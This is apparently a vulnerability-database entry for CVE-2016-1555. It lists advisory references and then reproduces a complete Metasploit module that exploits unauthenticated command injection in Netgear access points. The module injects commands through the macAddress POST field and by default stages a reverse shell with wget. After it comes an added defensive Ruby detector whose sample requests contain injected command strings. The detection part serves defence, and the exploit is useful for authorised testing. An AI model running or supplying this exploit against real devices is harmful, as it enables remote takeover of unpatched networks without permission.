| Title | Published | Views | Reporter |
|---|---|---|---|
| Netgear Unauthenticated Remote Command Execution Exploit | 27 Nov 2018 00:00 | – | zdt |
| CVE-2016-1555 | 21 Apr 2017 00:00 | – | attackerkb |
| CVE-2016-1555 | 26 Nov 2018 17:56 | – | circl |
| NETGEAR Multiple WAP Devices Command Injection Vulnerability | 25 Mar 2022 00:00 | – | cisa_kev |
| Netgear Multiple Device Authentication Bypass Vulnerability | 4 Mar 2016 00:00 | – | cnvd |
| Netgear Multiple Products Command Injection (CVE-2016-1555) | 9 Oct 2018 00:00 | – | checkpoint_advisories |
| CVE-2016-1555 | 21 Apr 2017 15:00 | – | cve |
| CVE-2016-1555 | 21 Apr 2017 15:00 | – | cvelist |
| Netgear Devices Unauthenticated Remote Command Execution | 8 Oct 2018 03:52 | – | metasploit |
| NETGEAR Multiple Model PHP Remote Command Injection | 22 May 2017 00:00 | – | nessus |
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Netgear Devices Unauthenticated Remote Command Execution',
      'Description' => %q{
        From the CVE-2016-1555 page: (1) boardData102.php, (2) boardData103.php,
        (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in
        Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350,
        WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute
        arbitrary commands.
      },
      'Author' =>
        [
          'Daming Dominic Chen <ddchen[at]cs.cmu.edu>', # Vuln discovery
          'Imran Dawoodjee <imrandawoodjee.infosec[at]gmail.com>' # MSF module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2016-1555'],
          ['URL', 'https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic'],
          ['PACKETSTORM', '135956'],
          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/112']
        ],
      'DisclosureDate' => 'Feb 25 2016', # According to http://seclists.org/fulldisclosure/2016/Feb/112
      'Privileged' => true,
      'Platform' => 'linux',
      'Arch' => ARCH_MIPSBE,
      'Payload' => {},
      'DefaultOptions' => {
        'CMDSTAGER::FLAVOR' => 'wget',
        'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp',
        'WfsDelay' => 10 },
      'Targets' => [['Automatic', { }]],
      'CmdStagerFlavor'=> %w{ echo printf wget },
      'DefaultTarget' => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'Path of the vulnerable URI.', '/boardDataWW.php']), # boardDataWW.php
        OptString.new('MAC_ADDRESS', [true, 'MAC address to use (default: random)', Rex::Text.rand_text_hex(12)])
      ])
  end

  # check for vulnerability existence
  def check
    fingerprint = Rex::Text.rand_text_alpha(12) # If vulnerability is present, we will get this back in the response
    res = execute_command("echo #{fingerprint}") # the raw POST response

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.code == 200
      return CheckCode::Safe
    end

    unless res.get_html_document.at('input').to_s.include? fingerprint
      return CheckCode::Safe
    end

    CheckCode::Vulnerable
  end

  # execute a command, or simply send a POST request
  def execute_command(cmd, opts = {})
    vars_post = {
      'macAddress' => "#{datastore['MAC_ADDRESS']};#{cmd};",
      'reginfo' => '1',
      'writeData' => 'Submit'
    }

    send_request_cgi({
      'method' => 'POST',
      'headers' => { 'Connection' => 'Keep-Alive' },
      'uri' => normalize_uri(target_uri.path),
      'vars_post' => vars_post
    })
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the target!")
  end

  # the exploit method
  def exploit
    # run a check before attempting to exploit
    unless [CheckCode::Vulnerable].include? check
      fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
    end

    execute_cmdstager(linemax: 2048) # maximum 130,000
  end
end
```
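
A defensive counterpart to the request built by `execute_command`, as an added example that is not part of the module or of the Metasploit project: it flags POSTs to the five boardData endpoints whose `macAddress` field is not a plain MAC address. The accepted MAC format, the function names and the sample requests are assumptions constructed for illustration.

```ruby
require 'uri'

# Endpoints listed in the CVE-2016-1555 description quoted by the module.
BOARD_DATA_PATHS = %w[
  /boardData102.php /boardData103.php /boardDataJP.php
  /boardDataNA.php /boardDataWW.php
].freeze

# Assumption: a legitimate macAddress is 12 hex digits, optionally separated
# by ':' or '-'. Anything else (such as ';' followed by text) is flagged.
VALID_MAC = /\A\h{2}(?:[:-]?\h{2}){5}\z/

# Returns nil for a request that looks benign, or a reason string otherwise.
def inspect_request(method, path, body)
  return nil unless method.to_s.upcase == 'POST'
  return nil unless BOARD_DATA_PATHS.include?(path.to_s.split('?').first)

  # Check every macAddress field, since a body may repeat the parameter.
  macs = URI.decode_www_form(body.to_s)
            .select { |key, _| key == 'macAddress' }
            .map(&:last)
  bad = macs.reject { |mac| mac.match?(VALID_MAC) }
  bad.empty? ? nil : "macAddress is not a MAC address: #{bad.first.inspect}"
rescue ArgumentError
  'request body is not valid form encoding'
end

# Constructed sample requests [method, path, body]; not captured traffic.
SAMPLES = [
  ['POST', '/boardDataWW.php', 'macAddress=0123456789ab&reginfo=1&writeData=Submit'],
  ['POST', '/boardDataWW.php', 'macAddress=0123456789ab%3Becho+test%3B&reginfo=1&writeData=Submit'],
  ['POST', '/boardDataNA.php', 'macAddress=0123456789ab%3Becho+x&macAddress=01:23:45:67:89:ab'],
  ['GET',  '/boardDataWW.php', '']
].freeze

# Returns [path, reason] pairs for the requests that were flagged.
def flagged(samples)
  samples.map { |meth, path, body| [path, inspect_request(meth, path, body)] }
         .reject { |_, reason| reason.nil? }
end

flagged(SAMPLES).each { |path, reason| puts "#{path}: #{reason}" }
```

The same allow-list test on `macAddress` can sit in a reverse proxy in front of devices that cannot yet be moved to the fixed firmware versions named in the description.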